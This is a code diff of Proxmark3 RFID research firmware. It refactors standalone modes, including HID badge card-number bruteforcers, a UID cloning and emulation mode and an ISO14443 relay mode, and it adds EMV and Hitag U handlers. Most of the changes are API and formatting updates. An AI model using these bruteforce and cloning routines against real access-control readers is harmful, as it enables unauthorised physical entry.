-            if (SimulateIso14443aInit(11, flags, data, &responses, &cuid, NULL, NULL, NULL) == false) {
+            if (SimulateIso14443aInit(11, flags, data, NULL, 0, &responses, &cuid, NULL, NULL) == false) {
                 BigBuf_free_keep_EM();
                 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
                 DbpString(_RED_("Error initializing the emulation process!"));
@@ -444,7 +445,7 @@ void RunMod(void) {
                     // received a RATS request
                 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) {
                     prevCmd = 0;
-                    p_response = &responses[RESP_INDEX_RATS];
+                    p_response = &responses[RESP_INDEX_ATS];
 
                 } else {
                     if (g_dbglevel == DBG_DEBUG) {

armsrc/Standalone/hf_reblay.c

@@ -81,7 +81,8 @@ void RunMod() {
 
 
     // UID 4 bytes(could be 7 bytes if needed it)
-    uint8_t flags = FLAG_4B_UID_IN_DATA;
+    uint8_t flags = 0;
+    FLAG_SET_UID_IN_DATA(flags, 4);
     // in case there is a read command received we shouldn't break
     uint8_t data[PM3_CMD_DATA_SIZE] = {0x00};
 
@@ -267,7 +268,7 @@ void RunMod() {
             BigBuf_free_keep_EM();
 
             // 4 = ISO/IEC 14443-4 - javacard (JCOP)
-            if (SimulateIso14443aInit(4, flags, data, &responses, &cuid, NULL, NULL, NULL) == false) {
+            if (SimulateIso14443aInit(4, flags, data, NULL, 0, &responses, &cuid, NULL, NULL) == false) {
                 BigBuf_free_keep_EM();
                 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
                 DbpString(_RED_("Error initializing the emulation process!"));
@@ -337,7 +338,7 @@ void RunMod() {
                 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) {  // Received a SELECT (cascade 1)
                     p_response = &responses[RESP_INDEX_SAKC1];
                 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) {  // Received a RATS request
-                    p_response = &responses[RESP_INDEX_RATS];
+                    p_response = &responses[RESP_INDEX_ATS];
                     resp = 1;
                 } else if (receivedCmd[0] == 0xf2 && len == 4) {  // ACKed - Time extension
                     DbpString(_YELLOW_("!!") " Reader accepted time extension!");

armsrc/Standalone/hf_tcprst.c

@@ -110,15 +110,14 @@ void RunMod(void) {
 #define DYNAMIC_RESPONSE_BUFFER_SIZE 64
 #define DYNAMIC_MODULATION_BUFFER_SIZE 512
 
-    uint8_t flags = FLAG_7B_UID_IN_DATA; // ST25TA have 7B UID
+    uint8_t flags = 0;
+    FLAG_SET_UID_IN_DATA(flags, 7); // ST25TA have 7B UID
     uint8_t data[PM3_CMD_DATA_SIZE] = {0x00}; // in case there is a read command received we shouldn't break
 
     // to initialize the emulation
     uint8_t tagType = 10; // 10 = ST25TA IKEA Rothult
     tag_response_info_t *responses;
     uint32_t cuid = 0;
-    uint32_t counters[3] = { 0x00, 0x00, 0x00 };
-    uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
     uint8_t pages = 0;
 
     // command buffers
@@ -192,7 +191,7 @@ void RunMod(void) {
 
             memcpy(data, stuid, sizeof(stuid));
 
-            if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
+            if (SimulateIso14443aInit(tagType, flags, data, NULL, 0, &responses, &cuid, &pages, NULL) == false) {
                 BigBuf_free_keep_EM();
                 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
                 DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
@@ -246,7 +245,7 @@ void RunMod(void) {
                 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) {  // Received a SELECT (cascade 2)
                     p_response = &responses[RESP_INDEX_SAKC2];
                 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) {  // Received a RATS request
-                    p_response = &responses[RESP_INDEX_RATS];
+                    p_response = &responses[RESP_INDEX_ATS];
                 } else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
                     p_response = &responses[RESP_INDEX_PPS];
                 } else {
@@ -370,7 +369,7 @@ void RunMod(void) {
 
             memcpy(data, stuid, sizeof(stuid));
 
-            if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
+            if (SimulateIso14443aInit(tagType, flags, data, NULL, 0, &responses, &cuid, &pages, NULL) == false) {
                 BigBuf_free_keep_EM();
                 reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
                 DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
@@ -424,7 +423,7 @@ void RunMod(void) {
                 } else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) {  // Received a SELECT (cascade 2)
                     p_response = &responses[RESP_INDEX_SAKC2];
                 } else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) {  // Received a RATS request
-                    p_response = &responses[RESP_INDEX_RATS];
+                    p_response = &responses[RESP_INDEX_ATS];
                 } else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
                     p_response = &responses[RESP_INDEX_PPS];
                 } else {

armsrc/Standalone/hf_unisniff.c

@@ -201,7 +201,7 @@ void RunMod(void) {
     // available after filling the trace buffer.
     char *filename = (char *)BigBuf_calloc(64);
     if (filename == NULL) {
-        Dbprintf("failed to allocate memory");
+        Dbprintf("Failed to allocate memory");
         return;
     }
     // Read the config file.  Size is limited to defined value so as not to consume

armsrc/Standalone/hf_young.c

@@ -55,7 +55,7 @@ void RunMod(void) {
 
     card_clone_t uids[OPTS];
     iso14a_card_select_t card[OPTS];
-    uint8_t params = (MAGIC_SINGLE | MAGIC_DATAIN);
+    uint8_t params = (MAGIC_SINGLE | MAGIC_WUPC | MAGIC_DATAIN);
 
     LED(selected + 1, 0);
 
@@ -96,7 +96,7 @@ void RunMod(void) {
                     }
                 }
 
-                if (!iso14443a_select_card(NULL, &card[selected], NULL, true, 0, true)) {
+                if (iso14443a_select_card(NULL, &card[selected], NULL, true, 0, true) == 0) {
                     FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
                     LED_D_OFF();
                     SpinDelay(500);
@@ -177,14 +177,14 @@ void RunMod(void) {
                             MifareCGetBlock(c->arg[0], c->arg[1], c->d.asBytes);
                             break;
 
-                mfCSetUID provides example logic for UID set workflow:
+                mf_chinese_set_uid provides example logic for UID set workflow:
                     -Read block0 from card in field with MifareCGetBlock()
                     -Configure new values without replacing reserved bytes
                             memcpy(block0, uid, 4); // Copy UID bytes from byte array
                             // Mifare UID BCC
                             block0[4] = block0[0]^block0[1]^block0[2]^block0[3]; // BCC on byte 5
                             Bytes 5-7 are reserved SAK and ATQA for mifare classic
-                    -Use mfCSetBlock(0, block0, oldUID, wantWipe, MAGIC_SINGLE) to write it
+                    -Use mf_chinese_set_block(0, block0, oldUID, wantWipe, MAGIC_SINGLE | MAGIC_WUPC) to write it
             */
             uint8_t oldBlock0[16] = {0}, newBlock0[16] = {0};
             // arg0 = Flags, arg1=blockNo
@@ -236,7 +236,8 @@ void RunMod(void) {
                 int button_pressed = BUTTON_HELD(1000);
                 if (button_pressed == BUTTON_NO_CLICK) {  // No button action, proceed with sim
 
-                    uint16_t flags = FLAG_4B_UID_IN_DATA;
+                    uint16_t flags = 0;
+                    FLAG_SET_UID_IN_DATA(flags, 4);
                     uint8_t data[PM3_CMD_DATA_SIZE] = {0}; // in case there is a read command received we shouldn't break
 
                     memcpy(data, uids[selected].uid, uids[selected].uidlen);
@@ -244,7 +245,7 @@ void RunMod(void) {
                     uint64_t tmpuid = bytes_to_num(uids[selected].uid, uids[selected].uidlen);
 
                     if (uids[selected].uidlen == 7) {
-                        flags = FLAG_7B_UID_IN_DATA;
+                        FLAG_SET_UID_IN_DATA(flags, 7);
                         Dbprintf("Simulating ISO14443a tag with uid: %014" PRIx64 " [Bank: %d]", tmpuid, selected);
                     } else {
                         Dbprintf("Simulating ISO14443a tag with uid: %08" PRIx64 " [Bank: %d]", tmpuid, selected);
@@ -252,25 +253,25 @@ void RunMod(void) {
 
                     if (uids[selected].sak == 0x08 && uids[selected].atqa[0] == 0x04 && uids[selected].atqa[1] == 0) {
                         DbpString("Mifare Classic 1k");
-                        SimulateIso14443aTag(1, flags, data, 0);
+                        SimulateIso14443aTag(1, flags, data, 0, NULL, 0, false, false);
                     } else if (uids[selected].sak == 0x18 && uids[selected].atqa[0] == 0x02 && uids[selected].atqa[1] == 0) {
                         DbpString("Mifare Classic 4k (4b uid)");
-                        SimulateIso14443aTag(8, flags, data, 0);
+                        SimulateIso14443aTag(8, flags, data, 0, NULL, 0, false, false);
                     } else if (uids[selected].sak == 0x08 && uids[selected].atqa[0] == 0x44 && uids[selected].atqa[1] == 0) {
                         DbpString("Mifare Classic 4k (7b uid)");
-                        SimulateIso14443aTag(8, flags, data, 0);
+                        SimulateIso14443aTag(8, flags, data, 0, NULL, 0, false, false);
                     } else if (uids[selected].sak == 0x00 && uids[selected].atqa[0] == 0x44 && uids[selected].atqa[1] == 0) {
                         DbpString("Mifare Ultralight");
-                        SimulateIso14443aTag(2, flags, data, 0);
+                        SimulateIso14443aTag(2, flags, data, 0, NULL, 0, false, false);
                     } else if (uids[selected].sak == 0x20 && uids[selected].atqa[0] == 0x04 && uids[selected].atqa[1] == 0x03) {
                         DbpString("Mifare DESFire");
-                        SimulateIso14443aTag(3, flags, data, 0);
+                        SimulateIso14443aTag(3, flags, data, 0, NULL, 0, false, false);
                     } else if (uids[selected].sak == 0x20 && uids[selected].atqa[0] == 0x44 && uids[selected].atqa[1] == 0x03) {
                         DbpString("Mifare DESFire Ev1/Plus/JCOP");
-                        SimulateIso14443aTag(3, flags, data, 0);
+                        SimulateIso14443aTag(3, flags, data, 0, NULL, 0, false, false);
                     } else {
                         Dbprintf("Unrecognized tag type -- defaulting to Mifare Classic emulation");
-                        SimulateIso14443aTag(1, flags, data, 0);
+                        SimulateIso14443aTag(1, flags, data, 0, NULL, 0, false, false);
                     }
 
                 } else if (button_pressed == BUTTON_SINGLE_CLICK) {

armsrc/Standalone/lf_hidbrute.c

@@ -30,7 +30,6 @@
 // main code for LF aka HID corporate brutefore by Federico Dotta & Maurizio Agazzini
 //-----------------------------------------------------------------------------------
 #include "standalone.h" // standalone definitions
-#include "lf_hidbrute.h"
 
 #include "proxmark3_arm.h"
 #include "appmain.h"
@@ -42,6 +41,8 @@
 
 #define OPTS 3
 
+static void hid_corporate_1000_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc);
+
 void ModInfo(void) {
     DbpString("  LF HID corporate 1000 bruteforce - aka Corporatebrute (Federico dotta & Maurizio Agazzini)");
 }
@@ -250,14 +251,14 @@ out:
 }
 
 // Function that calculate next value for the brutforce of HID corporate 1000
-void hid_corporate_1000_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) {
+static void hid_corporate_1000_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) {
 
     uint32_t new_high = 0;
     uint32_t new_low = 0;
 
     // Calculate new high and low base value from card number and facility code, without parity
     new_low = (fc << 21) | (cardnum << 1);
-    new_high = 0x28 | ((fc >> 11) & 1); // 0x28 is 101000
+    new_high = (fc >> 11) & 1;
 
     int n_ones;
     uint32_t i;
@@ -319,6 +320,7 @@ void hid_corporate_1000_calculate_checksum_and_set(uint32_t *high, uint32_t *low
         new_high = new_high | 0x4;
 
     // Setting new calculated values
+    add_HID_preamble(0, &new_high, &new_low, 35);
     *low = new_low;
     *high = new_high;
 }

armsrc/Standalone/lf_hidbrute.h

@@ -1,40 +0,0 @@
-//-----------------------------------------------------------------------------
-// Copyright (C) Federico Dotta and Maurizio Agazzini, 2015
-// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
-//
-// This program is free software: you can redistribute it and/or modify
-// it under the terms of the GNU General Public License as published by
-// the Free Software Foundation, either version 3 of the License, or
-// (at your option) any later version.
-//
-// This program is distributed in the hope that it will be useful,
-// but WITHOUT ANY WARRANTY; without even the implied warranty of
-// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-// GNU General Public License for more details.
-//
-// See LICENSE.txt for the text of the license.
-//-----------------------------------------------------------------------------
-// PROXMARK3 - HID CORPORATE 1000 BRUTEFORCER (STAND-ALONE MODE)
-//
-// The new stand-alone mode allows to execute a bruteforce on HID Corporate 1000 readers, by
-// reading a specific badge and bruteforcing the Card Number (incrementing and decrementing it),
-// mainteining the same Facility Code of the original badge.
-//
-// Based on an idea of Brad Antoniewicz of McAfee® Foundstone® Professional Services (ProxBrute),
-// the stand-alone mode has been rewritten in order to overcome some limitations of ProxBrute firmware,
-// that does not consider parity bits.
-//
-// https://github.com/federicodotta/proxmark3
-//
-//-----------------------------------------------------------------------------------
-// main code for LF aka HID corporate brutefore by Federico Dotta & Maurizio Agazzini
-//-----------------------------------------------------------------------------------
-
-#ifndef __LF_HIDBRUTE_H
-#define __LF_HIDBRUTE_H
-
-#include <stdint.h>
-
-void hid_corporate_1000_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc);
-
-#endif /* __LF_HIDBRUTE_H */

armsrc/Standalone/lf_hidfcbrute.c

@@ -37,8 +37,6 @@
  */
 
 #include "standalone.h"
-#include <inttypes.h>
-#include "lf_hidfcbrute.h"
 
 #include "proxmark3_arm.h"
 #include "appmain.h"
@@ -59,6 +57,8 @@
 
 #define LF_HIDCOLLECT_LOGFILE "lf_hid_fcbrute.log"
 
+static void hid_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc);
+
 static void append(uint8_t *entry, size_t entry_len) {
     LED_B_ON();
     DbpString("Writing... ");
@@ -166,7 +166,7 @@ void RunMod(void) {
     LEDsoff();
 }
 
-void hid_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) {
+static void hid_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) {
     uint32_t newhigh = 0;
     uint32_t newlow = 0;
 
@@ -176,8 +176,7 @@ void hid_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t card
     newlow |= oddparity32((newlow >> 1) & 0xFFF);
     newlow |= (evenparity32((newlow >> 13) & 0xFFF)) << 25;
 
-    newhigh |= 0x20; // Bit 37; standard header
-    newlow |= 1U << 26; // leading 1: start bit
+    add_HID_preamble(NULL, &newhigh, &newlow, 26);
 
     *low = newlow;
     *high = newhigh;

armsrc/Standalone/lf_icehid.c

@@ -199,7 +199,7 @@ static uint32_t IceIOdemod(void) {
 
     size_t size = MIN(12000, BigBuf_max_traceLen());
 
-//    uint8_t *dest = BigBuf_malloc(size);
+//    uint8_t *dest = BigBuf_calloc(size);
     uint8_t *dest = BigBuf_get_addr();
 
     //fskdemod and get start index
@@ -243,7 +243,7 @@ static uint32_t IceHIDDemod(void) {
     // large enough to catch 2 sequences of largest format
 //    size_t size = 50 * 128 * 2;  // 12800 bytes
     size_t size = MIN(12800, BigBuf_max_traceLen());
-    //uint8_t *dest = BigBuf_malloc(size);
+    //uint8_t *dest = BigBuf_calloc(size);
     uint8_t *dest = BigBuf_get_addr();
 
     // FSK demodulator

armsrc/Standalone/lf_prox2brute.c

@@ -16,8 +16,8 @@
 //-----------------------------------------------------------------------------
 // LF HID ProxII Brutforce v2 by lnv42 - based on Proxbrute by Brad antoniewicz
 //
-//     Following code is a trivial brute forcer for when you know the facility
-//     code and want to find valid(s) card number(s). It will try all card
+//     Following code is a trivial brute forcer (H10301 26-bit) when you know the
+//     facility code and want to find valid(s) card number(s). It will try all card
 //     fnumbers rom CARDNUM_START to CARDNUM_END one by one (max. ~65k tries).
 //     This brute force will be a lot faster than Proxbrute that will try all
 //     possibles values for LF low, even those with bad checksum (~4g tries).
@@ -46,8 +46,7 @@ void RunMod(void) {
     StandAloneMode();
     Dbprintf(">>  LF HID proxII bruteforce v2 a.k.a Prox2Brute Started <<");
     FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
-
-    const uint32_t high = 0x20; // LF high value is always 0x20 here
+    uint32_t high = 0;
 
     uint32_t fac = FACILITY_CODE, cardnum = 0;
 
@@ -82,6 +81,7 @@ void RunMod(void) {
         uint32_t low = (cardnum << 1) | (fac << 17);
         low |= oddparity32((low >> 1) & 0xFFF);
         low |= evenparity32((low >> 13) & 0xFFF) << 25;
+        add_HID_preamble(NULL, &high, &low, 26);
 
         Dbprintf("[=] trying Facility = %08x, Card = %08x, raw = %08x%08x",
                  fac, cardnum, high, low);

armsrc/Standalone/lf_tharexde.c

@@ -103,9 +103,9 @@ static bool get_input_data_from_file(uint32_t *tag, char *inputfile) {
     if (exists_in_spiffs(inputfile)) {
 
         uint32_t size = size_in_spiffs(inputfile);
-        uint8_t *mem = BigBuf_malloc(size);
+        uint8_t *mem = BigBuf_calloc(size);
 
-        Dbprintf(_YELLOW_("found input file %s"), inputfile);
+        Dbprintf("found input file `" _YELLOW_("%s") "`", inputfile);
 
         rdv40_spiffs_read_as_filetype(inputfile, mem, size, RDV40_SPIFFS_SAFETY_SAFE);
 

armsrc/appmain.c

@@ -41,6 +41,7 @@
 #include "hitag2.h"
 #include "hitag2_crack.h"
 #include "hitagS.h"
+#include "hitagu.h"
 #include "em4x50.h"
 #include "em4x70.h"
 #include "iclass.h"
@@ -54,6 +55,7 @@
 #include "mifarecmd.h"
 #include "mifaredesfire.h"
 #include "mifaresim.h"
+#include "emvsim.h"
 #include "pcf7931.h"
 #include "Standalone/standalone.h"
 #include "util.h"
@@ -97,12 +99,13 @@ int tearoff_hook(void) {
     if (g_tearoff_enabled) {
         if (g_tearoff_delay_us == 0) {
             Dbprintf(_RED_("No tear-off delay configured!"));
+            g_tearoff_enabled = false;
             return PM3_SUCCESS; // SUCCESS = the hook didn't do anything
         }
         SpinDelayUsPrecision(g_tearoff_delay_us);
         FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
         g_tearoff_enabled = false;
-        Dbprintf(_YELLOW_("Tear-off triggered!"));
+        if (g_dbglevel >= DBG_ERROR) Dbprintf(_YELLOW_("Tear-off triggered!"));
         return PM3_ETEAROFF;
     } else {
         return PM3_SUCCESS;     // SUCCESS = the hook didn't do anything
@@ -252,7 +255,7 @@ static uint32_t MeasureAntennaTuningLfData(void) {
 void print_stack_usage(void) {
     for (uint32_t *p = _stack_start; ; ++p) {
         if (*p != 0xdeadbeef) {
-            Dbprintf("  Max stack usage......... %d / %d bytes", (uint32_t)_stack_end - (uint32_t)p, (uint32_t)_stack_end - (uint32_t)_stack_start);
+            Dbprintf("  Max stack usage..... %d / %d bytes", (uint32_t)_stack_end - (uint32_t)p, (uint32_t)_stack_end - (uint32_t)_stack_start);
             break;
         }
     }
@@ -287,20 +290,19 @@ static void SendVersion(void) {
     if ((uint32_t)bootrom_version < (uint32_t)_flash_start || (uint32_t)bootrom_version >= (uint32_t)_flash_end) {
         strcat(VersionString, "bootrom version information appears invalid\n");
     } else {
-        FormatVersionInformation(temp, sizeof(temp), "  bootrom: ", bootrom_version);
+        FormatVersionInformation(temp, sizeof(temp), "  Bootrom.... ", bootrom_version);
         strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1);
         strncat(VersionString, "\n", sizeof(VersionString) - strlen(VersionString) - 1);
     }
 
-
-    FormatVersionInformation(temp, sizeof(temp), "       os: ", &g_version_information);
+    FormatVersionInformation(temp, sizeof(temp), "  OS......... ", &g_version_information);
     strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1);
     strncat(VersionString, "\n", sizeof(VersionString) - strlen(VersionString) - 1);
 
 #if defined(__clang__)
-    strncat(VersionString, "  compiled with Clang/LLVM "__VERSION__"\n", sizeof(VersionString) - strlen(VersionString) - 1);
+    strncat(VersionString, "  Compiler... Clang/LLVM "__VERSION__"\n", sizeof(VersionString) - strlen(VersionString) - 1);
 #elif defined(__GNUC__) || defined(__GNUG__)
-    strncat(VersionString, "  compiled with GCC "__VERSION__"\n", sizeof(VersionString) - strlen(VersionString) - 1);
+    strncat(VersionString, "  Compiler... GCC "__VERSION__"\n", sizeof(VersionString) - strlen(VersionString) - 1);
 #endif
 
     strncat(VersionString, "\n [ "_YELLOW_("FPGA")" ] \n ", sizeof(VersionString) - strlen(VersionString) - 1);
@@ -364,7 +366,7 @@ static void print_debug_level(void) {
             sprintf(dbglvlstr, "extended");
             break;
     }
-    Dbprintf("  Debug log level......... %d ( " _YELLOW_("%s")" )", g_dbglevel, dbglvlstr);
+    Dbprintf("  Debug log level..... %d ( " _YELLOW_("%s")" )", g_dbglevel, dbglvlstr);
 }
 
 // measure the Connection Speed by sending SpeedTestBufferSize bytes to client and measuring the elapsed time.
@@ -420,11 +422,11 @@ static void SendStatus(uint32_t wait) {
     print_debug_level();
 
     tosend_t *ts = get_tosend();
-    Dbprintf("  ToSendMax............... %d", ts->max);
-    Dbprintf("  ToSend BUFFERSIZE....... %d", TOSEND_BUFFER_SIZE);
+    Dbprintf("  ToSendMax........... %d", ts->max);
+    Dbprintf("  ToSend BUFFERSIZE... %d", TOSEND_BUFFER_SIZE);
     while ((AT91C_BASE_PMC->PMC_MCFR & AT91C_CKGR_MAINRDY) == 0);       // Wait for MAINF value to become available...
     uint16_t mainf = AT91C_BASE_PMC->PMC_MCFR & AT91C_CKGR_MAINF;       // Get # main clocks within 16 slow clocks
-    Dbprintf("  Slow clock.............. %d Hz", (16 * MAINCK) / mainf);
+    Dbprintf("  Slow clock.......... %d Hz", (16 * MAINCK) / mainf);
     uint32_t delta_time = 0;
     uint32_t start_time = GetTickCount();
 #define SLCK_CHECK_MS 50
@@ -440,7 +442,70 @@ static void SendStatus(uint32_t wait) {
     ModInfo();
 
 #ifdef WITH_FLASH
-    Flashmem_print_info();
+    DbpString(_CYAN_("Flash memory dictionary loaded"));
+    uint32_t num = 0;
+
+    if (exists_in_spiffs(MF_KEYS_FILE)) {
+        num = size_in_spiffs(MF_KEYS_FILE) / MF_KEY_LENGTH;
+    } else {
+        num = 0;
+    }
+
+    if (num > 0) {
+        Dbprintf("  Mifare... "_YELLOW_("%u")" keys - "_GREEN_("%s"), num, MF_KEYS_FILE);
+    } else {
+        Dbprintf("  Mifare... "_RED_("%u")" keys - "_RED_("%s"), num, MF_KEYS_FILE);
+    }
+
+    if (exists_in_spiffs(T55XX_KEYS_FILE)) {
+        num = size_in_spiffs(T55XX_KEYS_FILE) / T55XX_KEY_LENGTH;
+    } else {
+        num = 0;
+    }
+
+    if (num > 0) {
+        Dbprintf("  T55xx.... "_YELLOW_("%u")" keys - "_GREEN_("%s"), num, T55XX_KEYS_FILE);
+    } else {
+        Dbprintf("  T55xx.... "_RED_("%u")" keys - "_RED_("%s"), num, T55XX_KEYS_FILE);
+    }
+
+    if (exists_in_spiffs(ICLASS_KEYS_FILE)) {
+        num = size_in_spiffs(ICLASS_KEYS_FILE) / ICLASS_KEY_LENGTH;
+    } else {
+        num = 0;
+    }
+
+    if (num > 0) {
+        Dbprintf("  iClass... "_YELLOW_("%u")" keys - "_GREEN_("%s"), num, ICLASS_KEYS_FILE);
+    } else {
+        Dbprintf("  iClass... "_RED_("%u")" keys - "_RED_("%s"), num, ICLASS_KEYS_FILE);
+    }
+
+    if (exists_in_spiffs(MFULC_KEYS_FILE)) {
+        num = size_in_spiffs(MFULC_KEYS_FILE) / MFULC_KEY_LENGTH;
+    } else {
+        num = 0;
+    }
+
+    if (num > 0) {
+        Dbprintf("  UL-C..... "_YELLOW_("%u")" keys - "_GREEN_("%s"), num, MFULC_KEYS_FILE);
+    } else {
+        Dbprintf("  UL-C..... "_RED_("%u")" keys - "_RED_("%s"), num, MFULC_KEYS_FILE);
+    }
+
+    if (exists_in_spiffs(MFULAES_KEYS_FILE)) {
+        num = size_in_spiffs(MFULAES_KEYS_FILE) / MFULAES_KEY_LENGTH;
+    } else {
+        num = 0;
+    }
+
+    if (num > 0) {
+        Dbprintf("  UL-AES... "_YELLOW_("%u")" keys - "_GREEN_("%s"), num, MFULAES_KEYS_FILE);
+    } else {
+        Dbprintf("  UL-AES... "_RED_("%u")" keys - "_RED_("%s"), num, MFULAES_KEYS_FILE);
+    }
+
+
 #endif
     DbpString("");
     reply_ng(CMD_STATUS, PM3_SUCCESS, NULL, 0);
@@ -1153,7 +1218,7 @@ static void PacketReceived(PacketCommandNG *packet) {
             lf_hitag_data_t *payload = (lf_hitag_data_t *) packet->data.asBytes;
 
             switch (payload->cmd) {
-                case RHT2F_UID_ONLY: {
+                case HT2F_UID_ONLY: {
                     ht2_read_uid(NULL, true, true, false);
                     break;
                 }
@@ -1165,21 +1230,25 @@ static void PacketReceived(PacketCommandNG *packet) {
             break;
         }
         case CMD_LF_HITAGS_SIMULATE: { // Simulate Hitag s tag, args = memory content
-            SimulateHitagSTag((bool)packet->oldarg[0], packet->data.asBytes, true);
+            hts_simulate((bool)packet->oldarg[0], packet->oldarg[1], packet->data.asBytes, true);
             break;
         }
         case CMD_LF_HITAGS_TEST_TRACES: { // Tests every challenge within the given file
-            Hitag_check_challenges(packet->data.asBytes, packet->length, true);
+            hts_check_challenges(packet->data.asBytes, packet->length, true);
             break;
         }
         case CMD_LF_HITAGS_READ: { // Reader for only Hitag S tags, args = key or challenge
             lf_hitag_data_t *payload = (lf_hitag_data_t *) packet->data.asBytes;
-            ReadHitagS(payload, true);
+            hts_read(payload, true);
             break;
         }
         case CMD_LF_HITAGS_WRITE: {
             lf_hitag_data_t *payload = (lf_hitag_data_t *) packet->data.asBytes;
-            WritePageHitagS(payload, true);
+            hts_write_page(payload, true);
+            break;
+        }
+        case CMD_LF_HITAGS_UID: {
+            hts_read_uid(NULL, true, true);
             break;
         }
         case CMD_LF_HITAG2_WRITE: {
@@ -1193,6 +1262,25 @@ static void PacketReceived(PacketCommandNG *packet) {
             memcpy(mem, payload->data, payload->len);
             break;
         }
+
+        case CMD_LF_HITAGU_READ: {
+            lf_hitag_data_t *payload = (lf_hitag_data_t *)packet->data.asBytes;
+            htu_read(payload, true);
+            break;
+        }
+        case CMD_LF_HITAGU_WRITE: {
+            lf_hitag_data_t *payload = (lf_hitag_data_t *)packet->data.asBytes;
+            htu_write_page(payload, true);
+            break;
+        }
+        case CMD_LF_HITAGU_SIMULATE: {
+            htu_simulate((bool)packet->oldarg[0], packet->oldarg[1], packet->data.asBytes, true);
+            break;
+        }
+        case CMD_LF_HITAGU_UID: {
+            htu_read_uid(NULL, true, true);
+            break;
+        }
 #endif
 
 #ifdef WITH_EM4x50
@@ -1331,7 +1419,11 @@ static void PacketReceived(PacketCommandNG *packet) {
             // involved in dealing with emulator memory. But if it is called later, it might
             // destroy the Emulator Memory.
             //-----------------------------------------------------------------------------
-            EmlClearIso15693();
+            // Resetting the bitstream also frees the BigBuf memory, so we do this here to prevent
+            // an inconvenient reset in the future by Iso15693InitTag
+            FpgaDownloadAndGo(FPGA_BITSTREAM_HF_15);
+            BigBuf_Clear_EM();
+            reply_ng(CMD_HF_ISO15693_EML_CLEAR, PM3_SUCCESS, NULL, 0);
             break;
         }
         case CMD_HF_ISO15693_EML_SETMEM: {
@@ -1363,7 +1455,7 @@ static void PacketReceived(PacketCommandNG *packet) {
                 return;
             }
 
-            uint8_t *buf = BigBuf_malloc(payload->length);
+            uint8_t *buf = BigBuf_calloc(payload->length);
             emlGet(buf, payload->offset, payload->length);
             LED_B_ON();
             reply_ng(CMD_HF_ISO15693_EML_GETMEM, PM3_SUCCESS, buf, payload->length);
@@ -1424,6 +1516,17 @@ static void PacketReceived(PacketCommandNG *packet) {
             WritePasswordSlixIso15693(payload->old_pwd, payload->new_pwd, payload->pwd_id);
             break;
         }
+        case CMD_HF_ISO15693_SLIX_PROTECT_PAGE: {
+            struct p {
+                uint8_t read_pwd[4];
+                uint8_t write_pwd[4];
+                uint8_t divide_ptr;
+                uint8_t prot_status;
+            } PACKED;
+            struct p *payload = (struct p *) packet->data.asBytes;
+            ProtectPageSlixIso15693(payload->read_pwd, payload->write_pwd, payload->divide_ptr, payload->prot_status);
+            break;
+        }
         case CMD_HF_ISO15693_SLIX_DISABLE_PRIVACY: {
             struct p {
                 uint8_t pwd[4];
@@ -1591,13 +1694,13 @@ static void PacketReceived(PacketCommandNG *packet) {
             break;
         }
         case CMD_HF_ISO14443A_GET_CONFIG: {
-            hf14a_config *hf14aconfig = getHf14aConfig();
-            reply_ng(CMD_HF_ISO14443A_GET_CONFIG, PM3_SUCCESS, (uint8_t *)hf14aconfig, sizeof(hf14a_config));
+            hf14a_config_t *c = getHf14aConfig();
+            reply_ng(CMD_HF_ISO14443A_GET_CONFIG, PM3_SUCCESS, (uint8_t *)c, sizeof(hf14a_config_t));
             break;
         }
         case CMD_HF_ISO14443A_SET_CONFIG: {
-            hf14a_config c;
-            memcpy(&c, packet->data.asBytes, sizeof(hf14a_config));
+            hf14a_config_t c;
+            memcpy(&c, packet->data.asBytes, sizeof(hf14a_config_t));
             setHf14aConfig(&c);
             break;
         }
@@ -1624,15 +1727,57 @@ static void PacketReceived(PacketCommandNG *packet) {
             ReaderIso14443a(packet);
             break;
         }
+#ifdef WITH_SMARTCARD
+        case CMD_HF_ISO14443A_EMV_SIMULATE: {
+            struct p {
+                uint16_t flags;
+                uint8_t exitAfter;
+                uint8_t uid[7];
+                uint16_t atqa;
+                uint8_t sak;
+            } PACKED;
+            struct p *payload = (struct p *) packet->data.asBytes;
+
+            EMVsim(payload->flags, payload->exitAfter, payload->uid, payload->atqa, payload->sak);
+            break;
+        }
+#endif
         case CMD_HF_ISO14443A_SIMULATE: {
             struct p {
